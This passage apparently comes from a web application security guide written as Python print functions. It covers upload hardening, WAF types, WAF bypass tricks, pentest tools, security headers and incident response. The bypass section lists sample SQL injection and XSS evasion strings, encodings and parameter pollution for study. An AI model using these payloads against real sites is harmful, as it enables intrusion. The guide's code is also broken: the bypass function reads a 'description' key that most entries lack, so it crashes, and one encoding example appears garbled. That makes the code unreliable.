"✓ Set Content-Disposition: attachment for non-images",
"✓ Set appropriate Content-Type headers",
"✓ Disable content sniffing (X-Content-Type-Options: nosniff)"
],
"Image-Specific Protections": [
"✓ Re-encode images to remove metadata and exploits",
"✓ Resize/recompress images",
"✓ Use image libraries (not raw file copy)",
"✓ Verify image integrity"
],
"Monitoring": [
"✓ Log upload attempts",
"✓ Monitor for suspicious file types",
"✓ Alert on unusual patterns",
"✓ Regular security audits"
]
}
for category, items in practices.items():
print(f"\n{category}:")
for item in items:
print(f" {item}")
secure_file_upload()
12. Web Application Firewall (WAF)
WAF Types and Capabilities
class WebApplicationFirewall:
"""WAF analysis and configuration"""
def __init__(self):
self.waf_types = {
"Network-based WAF": {
"deployment": "Hardware appliance on-premises",
"advantages": ["Low latency", "Full control", "No dependency on cloud"],
"disadvantages": ["Expensive", "Maintenance required", "Scaling challenges"]
},
"Cloud-based WAF": {
"deployment": "DNS-based (Cloudflare, AWS WAF, Imperva)",
"advantages": ["Easy deployment", "Scalable", "Always updated"],
"disadvantages": ["Subscription cost", "Latency", "Third-party dependency"]
},
"Host-based WAF": {
"deployment": "Software on application server",
"advantages": ["Deep application integration", "Customizable rules"],
"disadvantages": ["Consumes server resources", "Can be bypassed"]
}
}
self.protection_capabilities = [
"SQL injection detection and blocking",
"Cross-site scripting (XSS) prevention",
"Path traversal protection",
"CSRF token validation",
"Request rate limiting",
"IP reputation filtering",
"Bot mitigation",
"Protocol validation",
"Size limitations",
"Custom rule creation"
]
def display_types(self):
print("\nWAF Types and Comparison")
print("=" * 70)
for waf_type, details in self.waf_types.items():
print(f"\n{waf_type}:")
print(f" Deployment: {details['deployment']}")
print(f" Advantages: {', '.join(details['advantages'])}")
print(f" Disadvantages: {', '.join(details['disadvantages'])}")
def display_capabilities(self):
print("\nWAF Protection Capabilities:")
for cap in self.protection_capabilities:
print(f" • {cap}")
waf = WebApplicationFirewall()
waf.display_types()
waf.display_capabilities()
WAF Bypass Techniques
def waf_bypass_techniques():
"""WAF bypass techniques"""
print("\nWAF Bypass Techniques")
print("=" * 60)
techniques = {
"Case Variation": {
"description": "Mix case to evade pattern matching",
"example_sql": "SeLeCt * FrOm users",
"example_xss": "<ScRiPt>alert(1)</ScRiPt>"
},
"Encoding Techniques": {
"methods": [
"URL encoding (%3Cscript%3E)",
"Double encoding (%253Cscript%253E)",
"Unicode encoding (\\u003c)",
"Hex encoding (\\x3c)",
"Base64 encoding",
"HTML entities (<)"
]
},
"Obfuscation": {
"methods": [
"Comment insertion (SEL/**/ECT)",
"Line breaks (SEL\nECT)",
"Null bytes (SEL%00ECT)",
"Function wrapping (concat('se','lect'))"
]
},
"Protocol Manipulation": {
"methods": [
"HTTP parameter pollution (id=1&id=union)",
"Using uncommon HTTP methods (HEAD, TRACE)",
"Chunked transfer encoding",
"Pipeline requests"
]
}
}
for technique, details in techniques.items():
print(f"\n{technique}:")
print(f" {details['description']}")
if 'methods' in details:
print(" Methods:")
for method in details['methods'][:4]:
print(f" • {method}")
waf_bypass_techniques()
13. Penetration Testing Tools
Web Application Testing Tools
def web_app_testing_tools():
"""Common web application testing tools"""
print("\nWeb Application Penetration Testing Tools")
print("=" * 70)
tools = {
"Burp Suite": {
"category": "Proxy/Scanner",
"purpose": "Intercept, modify, and analyze HTTP traffic",
"features": [
"Intruder (automated attacks)",
"Repeater (manual request manipulation)",
"Scanner (vulnerability detection)",
"Sequencer (session token analysis)"
]
},
"OWASP ZAP": {
"category": "Proxy/Scanner",
"purpose": "Open-source alternative to Burp Suite",
"features": [
"Automated scanner",
"Fuzzing",
"API testing",
"HUD (Heads Up Display)"
]
},
"sqlmap": {
"category": "SQL Injection",
"purpose": "Automated SQL injection exploitation",
"features": [
"Database fingerprinting",
"Data extraction",
"Command execution",
"File system access"
]
},
"Nikto": {
"category": "Scanner",
"purpose": "Web server vulnerability scanner",
"features": [
"Server configuration checks",
"Outdated software detection",
"CGI scanning",
"File existence checks"
]
},
"Nmap": {
"category": "Discovery",
"purpose": "Network and port scanning",
"features": [
"Service detection",
"OS fingerprinting",
"Script engine (NSE)",
"Vulnerability scanning"
]
},
"Metasploit": {
"category": "Exploitation",
"purpose": "Exploit development and execution",
"features": [
"Payload generation",
"Exploit modules",
"Post-exploitation tools",
"Meterpreter"
]
}
}
for tool, details in tools.items():
print(f"\n{tool}:")
print(f" Category: {details['category']}")
print(f" Purpose: {details['purpose']}")
print(" Features:")
for feature in details['features'][:3]:
print(f" • {feature}")
web_app_testing_tools()
14. Security Headers
Essential Security Headers
def security_headers():
"""Security headers for web applications"""
print("\nEssential Security Headers")
print("=" * 70)
headers = {
"Content-Security-Policy (CSP)": {
"purpose": "Prevent XSS, data injection",
"example": "default-src 'self'; script-src 'self' https://trusted.cdn.com",
"directives": [
"default-src", "script-src", "style-src", "img-src", "connect-src"
],
"severity": "Critical"
},
"HTTP Strict Transport Security (HSTS)": {
"purpose": "Enforce HTTPS connections",
"example": "Strict-Transport-Security: max-age=31536000; includeSubDomains; preload",
"parameters": ["max-age", "includeSubDomains", "preload"],
"severity": "High"
},
"X-Frame-Options": {
"purpose": "Prevent clickjacking",
"example": "X-Frame-Options: DENY",
"options": ["DENY", "SAMEORIGIN", "ALLOW-FROM uri"],
"severity": "High"
},
"X-Content-Type-Options": {
"purpose": "Prevent MIME type sniffing",
"example": "X-Content-Type-Options: nosniff",
"severity": "Medium"
},
"Referrer-Policy": {
"purpose": "Control referrer information",
"example": "Referrer-Policy: strict-origin-when-cross-origin",
"options": [
"no-referrer", "no-referrer-when-downgrade", "origin",
"strict-origin", "strict-origin-when-cross-origin"
],
"severity": "Medium"
},
"Permissions-Policy": {
"purpose": "Control browser features",
"example": "Permissions-Policy: geolocation=(), microphone=()",
"features": ["geolocation", "microphone", "camera", "payment"],
"severity": "Medium"
}
}
for header, details in headers.items():
print(f"\n{header}:")
print(f" Purpose: {details['purpose']}")
print(f" Example: {details['example']}")
if 'directives' in details:
print(f" Directives: {', '.join(details['directives'])}")
if 'options' in details:
print(f" Options: {', '.join(details['options'])}")
print(f" Severity: {details['severity']}")
security_headers()
15. Incident Response for Web Attacks
Web Attack Response Plan
def incident_response_plan():
"""Web application incident response plan"""
print("\nWeb Application Incident Response Plan")
print("=" * 70)
phases = {
"1. Preparation": {
"activities": [
"Maintain incident response team contact list",
"Have rollback procedures ready",
"Maintain backups (code, database, configuration)",
"Establish communication channels",
"Create runbooks for common attack types"
]
},
"2. Detection": {
"indicators": [
"Unusual traffic patterns",
"WAF/IDS alerts",
"Error log anomalies",
"User reports",
"File integrity monitoring alerts"
],
"sources": [
"Web server logs",
"Application logs",
"Database logs",
"Network monitoring",
"WAF/IDS alerts"
]
},
"3. Analysis": {
"questions": [
"What type of attack?",
"When did it start?",
"What systems/accounts affected?",
"What data accessed/modified?",
"Was malware deployed?"
]
},
"4. Containment": {
"actions": [
"Block attacking IPs",
"Take affected systems offline",
"Disable compromised accounts",
"Implement temporary WAF rules",
"Isolate affected application instances"
]
},
"5. Eradication": {
"actions": [
"Remove malicious code",
"Patch vulnerabilities",
"Reset credentials",
"Restore from clean backups",
"Apply security updates"
]
},
"6. Recovery": {
"actions": [
"Restore services (staged rollout)",
"Monitor for reinfection",
"Verify integrity",
"Update security controls"
]
},
"7. Lessons Learned": {
"activities": [
"Post-mortem analysis",
"Update security controls",
"Improve detection capabilities",
"Update runbooks",
"Team training"
]
}
}
for phase, details in phases.items():
print(f"\n{phase}:")
if 'activities' in details:
for activity in details['activities']:
print(f" • {activity}")
if 'indicators' in details:
print(" Detection Indicators:")
for indicator in details['indicators']:
print(f" • {indicator}")
incident_response_plan()
Conclusion
Key Takeaways
def conclusion():
"""Summary of web application security key points"""
print("\n" + "="*70)
print("WEB APPLICATION SECURITY: KEY TAKEAWAYS")
print("="*70)
takeaways = [
("Defense in Depth", "Multiple security layers: network, application, data"),
("Input Validation", "All user input must be validated and sanitized"),
("Least Privilege", "Users and services need minimum required access"),
("Secure by Default", "Security should be built-in, not added later"),
("Continuous Testing", "Regular security testing and code reviews are essential"),
("Update Regularly", "Keep all components patched and up-to-date"),
("Monitor and Log", "Detect attacks early with proper monitoring"),
("User Education", "Train users to recognize social engineering"),
("Incident Response", "Have plan ready before incidents occur")
]
for takeaway, detail in takeaways:
print(f"\n📌 {takeaway}")
print(f" {detail}")
conclusion()
Final Recommendations
def final_recommendations():
"""Actionable security recommendations"""
print("\nACTIONABLE SECURITY RECOMMENDATIONS")
print("=" * 70)
recommendations = [
"1. Implement HTTPS everywhere (TLS 1.2/1.3 only)",
"2. Use parameterized queries to prevent SQL injection",
"3. Implement Content Security Policy (CSP)",
"4. Enable all security headers (HSTS, X-Frame-Options, etc.)",
"5. Deploy Web Application Firewall (WAF)",
"6. Conduct regular penetration testing",
"7. Use automated vulnerability scanning",
"8. Implement strong authentication (MFA)",
"9. Sanitize all user input (server-side)",
"10. Keep software dependencies updated",
"11. Monitor for unusual activity",
"12. Have incident response plan ready",
"13. Secure API endpoints with proper auth",
"14. Implement rate limiting",
"15. Educate developers on secure coding"
]
for rec in recommendations:
print(rec)
final_recommendations()
Summary
Web application attacks remain one of the most significant cybersecurity threats. This comprehensive guide covered:
- OWASP Top 10 framework for understanding major risks
- Injection Attacks: SQLi, Command Injection, NoSQL
- Cross-Site Scripting (XSS) variants and prevention
- CSRF protection mechanisms
- Authentication & Session security
- SSRF attacks and mitigation
- XXE and deserialization vulnerabilities
- API Security best practices
- File Upload security
- WAF deployment and bypass techniques
- Security Headers implementation
- Incident Response planning
Security Maturity Model
def security_maturity():
"""Web application security maturity levels"""
print("\nWeb Application Security Maturity Model")
print("=" * 70)
levels = {
"Level 1 - Reactive": {
"characteristics": [
"No formal security testing",
"Reactive patching only",
"Limited security awareness"
]
},
"Level 2 - Foundational": {
"characteristics": [
"Basic security testing",
"Regular patching schedule",
"Developer security training"
]
},
"Level 3 - Proactive": {
"characteristics": [
"Automated security testing",
"Security in CI/CD pipeline",
"Threat modeling",
"Regular penetration testing"
]
},
"Level 4 - Advanced": {
"characteristics": [
"Bug bounty program",
"Continuous security monitoring",
"Security champions program",
"Advanced threat hunting"
]
},
"Level 5 - Adaptive": {
"characteristics": [
"Self-healing systems",
"Automated incident response",
"AI-driven threat detection",
"Security by design"
]
}
}
for level, details in levels.items():
print(f"\n{level}:")
for characteristic in details['characteristics']:
print(f" • {characteristic}")
security_maturity()
The journey to secure web applications is continuous. Regular assessment, testing, and improvement are essential to stay ahead of evolving threats. Remember: security is not a destination but an ongoing process of improvement and adaptation.